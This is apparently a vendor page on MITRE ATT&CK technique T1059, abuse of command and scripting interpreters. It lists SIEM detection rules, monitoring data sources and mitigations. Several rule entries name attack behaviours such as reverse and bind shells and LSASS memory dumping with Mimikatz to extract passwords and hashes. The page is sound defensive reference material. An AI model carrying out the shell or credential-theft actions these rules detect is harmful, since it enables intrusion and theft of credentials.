Technique on mitre.org

T1059: Command and Scripting Interpreter

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.

There are also cross-platform interpreters such as Python, as well as those commonly associated with client applications such as JavaScript and Visual Basic.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in Initial Access payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various Remote Services in order to achieve remote Execution.

Positive Technologies products that cover the technique

MaxPatrol SIEM knowledge base

pt_application_firewall: PT-CR-1915: PTAF_Hacktool_Detected: PT AF detected signs of a hacking tool being used it_bastion: PT-CR-2171: SKDPUNT_Suspicious_Command: A user executed a potentially dangerous command it_bastion: PT-CR-2184: SKDPUNT_Blacklisted_Command: A blacklisted command is executed it_bastion: PT-CR-2177: SKDPUNT_Potentially_Dangerous_Command: Potentially dangerous commands are used mysql_database: PT-CR-613: MySQL_Structure_Discovery: Execution of certain SQL commands may indicate reconnaissance of the internal structure of the MySQL database, which may indicate attacker activity mysql_database: PT-CR-617: MySQL_Code_Execution: Running a process under a database account may indicate an attempt of an attacker who gained the ability to execute queries to the database to escalate privileges mysql_database: PT-CR-2304: MySQL_File_System_Actions: The interaction of the MySQL database with the file system may indicate reconnaissance or an attempt of an attacker to escalate privileges if this is not the standard integration of the database with external systems mitre_attck_execution: PT-CR-339: Script_Files_Execution: A user attempted to run a script unix_mitre_attck_execution: PT-CR-1678: Unix_File_Creation_By_Script: A file was created using a Python or Ruby script unix_mitre_attck_execution: PT-CR-296: Unix_Reverse_Shell: A reverse-shell connection using third-party tools unix_mitre_attck_execution: PT-CR-1031: Unix_Inline_Reverse_Or_Bind_Shell: Bind or reverse shell creation is detected based on specific command line patterns unix_mitre_attck_execution: PT-CR-1018: Unix_Hacktool_Usage: The rule detects the use of security analysis tools on Unix hosts sap_suspicious_user_activity: PT-CR-254: SAPASABAP_GW_Sapxpg_Call: SAPXPG run mitre_attck_cred_access: PT-CR-2124: LSASS_Dump_Via_RPC: A user accessed the LSASS process memory. After connecting the corresponding utility (such as Mimikatz) to the RPC server and gaining access to the LSASS process memory, attackers can save this memory in a separate file to later extract passwords and NTLM hashes from it.

Subtechniques

Detection

ID	DS0012	Data source and component	Script: Script Execution	Description	Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.

ID	DS0009	Data source and component	Process: Process Creation	Description	Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.

ID	DS0017	Data source and component	Command: Command Execution	Description	Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.

ID	DS0009	Data source and component	Process: Process Metadata	Description	Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the `EngineVersion` field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the `HostName` field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.

ID	DS0011	Data source and component	Module: Module Load	Description	Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).

ID	Data source and component	Description
DS0012	Script: Script Execution	Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
DS0009	Process: Process Creation	Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
DS0017	Command: Command Execution	Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.
DS0009	Process: Process Metadata	Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the `EngineVersion` field (which may also be relevant to detecting a potential Downgrade Attack) as well as if PowerShell is running locally or remotely in the `HostName` field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.
DS0011	Module: Module Load	Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).

Mitigation

ID	M1021	Name	Restrict Web-Based Content	Description	Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.

ID	M1026	Name	Privileged Account Management	Description	When PowerShell is necessary, consider restricting PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. PowerShell JEA (Just Enough Administration) may also be used to sandbox administration and limit what commands admins/users can execute through remote PowerShell sessions.

ID	M1038	Name	Execution Prevention	Description	Use application control where appropriate. For example, PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., `Add-Type`).

ID	M1040	Name	Behavior Prevention on Endpoint	Description	On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Visual Basic and JavaScript scripts from executing potentially malicious downloaded content .

ID	M1042	Name	Disable or Remove Feature or Program	Description	Disable or remove any unnecessary or unused shells or interpreters.

ID	M1045	Name	Code Signing	Description	Where possible, only permit execution of signed scripts.

ID	M1049	Name	Antivirus/Antimalware	Description	Anti-virus can be used to automatically quarantine suspicious files.

ID	Name	Description
M1021	Restrict Web-Based Content	Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.
M1026	Privileged Account Management	When PowerShell is necessary, consider restricting PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. PowerShell JEA (Just Enough Administration) may also be used to sandbox administration and limit what commands admins/users can execute through remote PowerShell sessions.
M1038	Execution Prevention	Use application control where appropriate. For example, PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., `Add-Type`).
M1040	Behavior Prevention on Endpoint	On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Visual Basic and JavaScript scripts from executing potentially malicious downloaded content .
M1042	Disable or Remove Feature or Program	Disable or remove any unnecessary or unused shells or interpreters.
M1045	Code Signing	Where possible, only permit execution of signed scripts.
M1049	Antivirus/Antimalware	Anti-virus can be used to automatically quarantine suspicious files.